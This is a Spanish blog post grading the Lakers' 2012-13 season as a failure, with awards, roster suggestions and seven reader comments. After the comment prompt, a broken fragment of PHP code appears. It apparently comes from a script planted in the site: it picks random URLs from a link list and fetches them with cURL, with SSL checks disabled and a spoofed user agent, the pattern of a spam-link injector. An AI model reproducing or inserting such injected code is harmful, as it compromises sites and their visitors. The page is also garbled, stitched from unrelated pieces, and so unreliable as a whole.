Los Angeles Lakers: Muy deficiente

23 de July de 2013 por TheDeerHunter

Un hecho sin precedentes en TJNBA. Desde el nacimiento del blog nunca habíamos “condecorado” a la franquicia de dorado y púrpura con la peor calificación posible. No es para menos. Estamos ante una de las decepciones más grandes que se han producido en esta liga. “Ser campeones o no ser” titulábamos en su día. Ahora va a tocar “no ser” durante un periodo de tiempo indeterminado.

Tras los sinsabores de las últimas campañas y con la vista puesta en el acechante final de la era Kobe, Mitch Kupchack tiraba del manual de trucos y confeccionaba uno de sus proyectos más ambiciosos. Póker de ases encabezado por Kobe, con Pau aún a su lado, añadiendo a Superman Howard, Steve Nash y el banquillo, sobre el papel, más potente de los últimos tiempos. Todo, eso sí, a las órdenes de Mike Brown a pesar de la que había caído el año anterior. Quizá ese fuera el primer error en un probable exceso de confianza.

Así, continuando la tradición local, crecían las expectativas hasta dar por sentado muchas cosas. En L.A. título y fracaso son las dos caras de una misma moneda, ya se demostró en aquel subcampeonato de los “4 fantásticos”. Va en la idiosincrasia de una franquicia acostumbrada únicamente al buen vino y al caviar. Nivel de exigencia máximo adobado con unas gotas de prepotencia. Muy pronto empezaría a verse que el vino estaba agrio y el caviar era sucedáneo. 

100% de derrotas en pretemporada más un 0-3 en el inicio de la regular sumadas a las últimas derrotas de la anterior campaña. 0-15, lo nunca visto. Se estrenaban contra Detroit pero caían nuevamente contra Utah ofreciendo otra constante, una imagen penosa. Con los antecedentes del curso pasado en la mochila, Mike Brown se iba de cabeza a la cola del paro en semana y media. A su favor hay que decir que desde muy temprano los problemas físicos habían hecho acto de presencia. Otra constante durante toda la campaña.

Pero la fiesta acababa de empezar. Sin venir demasiado a cuento se organizaba un auténtico esperpento en el amago de contratación de Phil Jackson. Ante el asombro de la parroquia llegaba Mike D’Antoni, muy en sintonía con el Steve Nash idealizado pero incompatible con la configuración “pesada” de una plantilla veterana. El técnico nunca trató de ocultar su incomodidad en este aspecto y el primer damnificado era (otra vez) el peor Gasol de su carrera. No llegamos a saber si fue antes el huevo o la gallina. Los malos rollos se extendieron a múltiples frentes, incluido la absurda lucha de poderes entre Kobe y Howard que, por lo visto, pretendía llegar, ver y conquistar sin poner argumentos adicionales de su parte.

Con la grada coreando el nombre del maestro Zen la situación quedó siempre lejos de estabilizarse. Lesiones a parte, diríamos que nunca se vio a estos niveles un equipo que defendiera peor. Sólo un Kobe Bryant renacido mantenía viva la esperanza de cambiar la dinámica. Los Lakers sumaban en Enero un 40% de victorias y todo indicaba que se irían de vacaciones al final de la regular.

De alguna forma el equipo logró conjurarse para evitarlo… hasta que 3 duelos antes de playoffs Kobe Bryant se rompía con la lesión más terrible de su carrera. Una tragedia sólo a la altura de la pésima campaña del equipo.

El resto es historia. Los Lakers se “enfrentaron” en primera ronda a unos Spurs a galaxias de distancia de nivel con el consiguiente ridículo. El culebrón Howard terminaba con su capita de superhéroe en Houston y el equipo pasaba a modo de reconstrucción latente. Fichajes de corta duración hasta ver lo que pasa con Kobe y muy pocos objetivos concretos. La 2013/14 prácticamente se da por perdida. Nada ha podido salir peor y ahora hay que encontrar un rumbo. De no obrar milagros (Kupchap o Kobe mediante) éste parece el final definitivo de una de las etapas más brillantes de la historia de la franquicia.

PREMIOS

MVP: Kobe Bryant. A sus 34 años ha cuajado su campaña más redonda desde la temporada del MVP. Más potente que en otras ocasiones, más preciso, más generoso en todos los aspectos, intentando contagiar a los suyos. Sólo cuando la dificultad es tan extrema podemos visualizar la verdadera dimensión de su juego. Si El Quijote hubiera vestido la #24 quizá hubiera derrotado a los molinos

Sorpresa: Un punto a favor de D’Antoni ha sido el descubrimiento de Earl Clark para la causa. De ser un absoluto marginado en la rotación a sentar a Pau, sin estaciones intermedias. Su rendimiento en Febrero y Marzo fue vital para que los Lakers pudieran llegar a levantar cabeza. Luego terminó diluyéndose cual azucarillo pero su nuevo contrato ya lo tenía asegurado… y lo que es aún mejor, lejos de L.A.

Decepción: La lesión de Kobe. Hasta en su lesión le vienen reminiscencias de semidiós. Aquiles también cayó derrotado. Del resto, a alguno no le llega ni para decepción. Si hubiera un premio de “mareón de franquicias” este año tendría dueño claro tras dos campañas de mucho esfuerzo. Buen viaje lleve como descanso deja.

Esfuerzo en vano: Toca monográfico. Nuevamente Kobe. Hasta su lesión llevaba 78 partidos promediando 38.6 minutos por noche. Todo lo humanamente jugable y desde luego muy lejos de lo deseable pero era la única opción de tocar postemporada. Si el personal esperaba que en su ausencia el personal destaparía el tarro de las esencias queda demostrado hasta donde llega cada cual. Algún apelativo no se llevará Kobe, el de “Cid Campeador”.

JUGANDO A GM

A estas alturas queda muy poco pescado por vender. En términos generales aprobamos lo que se ha hecho dadas las circunstancias.

– Apartado entradas: Kaman, Wesley Johnson, Nick Young… Gente que lo puede hacer bien (para los objetivos que se barajan) y sin comprometer el futuro en absoluto. No le podemos poner ningún pero. Nostálgicamente la vuelta de Farmar es la guinda.

-La marcha de MWP: No podemos ignorar que desde hace tiempo era una medida que se tenía sobre la mesa. Tras su notable campaña y el único año que le quedaba de contrato es cuando menos le vemos sentido.

– La continuidad de Gasol: Tras despejarse todas las dudas y descansar, quizá más de la cuenta, durante el veranito esperamos ver la versión más positiva de Pau. No quedan más excusas posibles.

– La vuelta de Kobe en pretemporada. Estupidez mostrada por el Sr. Jim Buss. Sólo hace falta que alguien comience una campaña a “lo Rose” para crear absurdas expectativas. Como si a alguien le importara un comino en qué fecha fuera a volver Kobe este año. Si vuelve pareciéndose mínimamente a si mismo será el mayor de los éxitos posibles.

– Hace falta algún fichaje más de perfil medio/bajo y, que esté dispuesto de jugarse las habichuelas en un contrato de un año para revalorizarse y quizá ganarse su permanencia en L.A. Suenan nombres como DeJuan Blair, Austin Daye, Louis Admundson, Maxiell, Ivan Johnson, James Johnson… Si tuviera que elegir me quedaría con Blair con los ojos cerrados. Si puede ser también a James Johnson para reforzar las alas con un especialista defensivo.

Así esto es lo que nos quedaría algo medianamente apañado para pasar este trago:

PG: Nash, Blake, Farmar
SG: Kobe, Meeks, Nick Young
SF: Wesley Johnson, James Johnson
PF: Gasol, Blair, Ryan Kelly
C: Kaman, Hill, Sacre

Comenta

7 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Maxiell imposible, está en los Magic creo. Buen análisis y ha sacar la grada de discos y el chisel…. este año toca barbecho.

      Citar

  2. Denise dice:
    #2

    Creo que la decepción es Howard.
    Con los números en la mano, parece que su temporada no ha sido mala, pero excepto en pocos partidos que se pueden contar con los dedos de la mano, nunca ha sido el pivot dominante que se esperaba, si a eso le sumas su caracter infantiloide con sus sonrisas con el equipo perdiendo de 20, la manera de borrarse en algunos partidos como el último contra los Spurs, el juego de marear la perdiz con su ya clásico me voy-me quedo, y sus estupidas luchas internas contra Kobe dan como resultado a uno de los jugadores mas decepcionantes en la historia de la franquicia.

    Por lo demas, supongo que el proyecto de la franquicia será el renovar a Kobe y Gasol muy a la baja y hacerse con Lebron ó Melo.
    Aunque a día de hoy, no veo a Lebron de purpura y oro, Melo es más posible.
    Aunque de estos bichos, el jugador que ha nacido para jugar en Lakers (imitando las payasadas de Florentino) es Kevin Durant. Creo que es el mejor heredero de Kobe que podrían tener los Lakers.

      Citar

  3. Esteban dice:
    #3

    la decepcion es d`antoni, nunca vi una p`lantilla tan mal mal mal barajada

    gasol a tirar de triples, metta world peace lanzado mas que howard, jamison borrado por varios juegos de la rotación cuando podria haber sido el lamar odom de howard y gasol, cosas inentendibles

    la dirigencia no se queda atras con el expiring de duhon y hasta clark podrian haber intentado dar un golpe de timon con algun traspaso, pues se veía que con ese equipo no se llegaba a ningún lado y aún asi no hicieron nada

      Citar

  4. Vader dice:
    #4

    Exculpo totalmente a Gasol. Muchos problemas de lesiones y encima con su edad (y el peso de musculatura que ha ganado con los años) viene D’Antoni y lo pone a jugar lejos del aro… Otro la hubiera liado exigiendo nuevo técnico o traspaso. Al final de temporada, físicamente mejor y jugando por dentro ya vimos al auténtico Gasol…

      Citar

  5. r_miller dice:
    #5

    Creo que soy de esas personas que estaran una semana sin comer cuando se retire Kobe, porque para mi que tengo 15 años Kobe lo es todo en el baloncesto y viendolo con 33 o 34 luchando como lucha me hace creer en esa fabrica de billetes que son los Lakers. A Jordan le e visto poco pero no me imagino a Lebron con 34 jugando 40 minutos en un equipo perdedor como se vio desde el primer momento que era este gran proyecto. Conociendo a Lebron se hiria a Chicago o volveria a Cleveland antes de volver a estar solo, como Kobe a estado en muchos momentos y a aguantado al equipo, hay quien lo llama chupon, yo lo llamo un sacrificado en defensa y ataque.

      Citar

  6. Sancho88 dice:
    #6

    Puedes llorar por él y seguir zampando coño, ambas cosas no son incompatibles. Yo también lloré cuando murió el Chava Jiménez, pero me comí un chuletón porque tenía hambre. Ambas cosas no son incompatibles

      Citar

  7. sempren dice:
    #7

    ¿Qué tipo de chuletón? ¿Era de Irún? Es que eso sería lo lógico en tu caso, es diferente que con Kobe xD

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>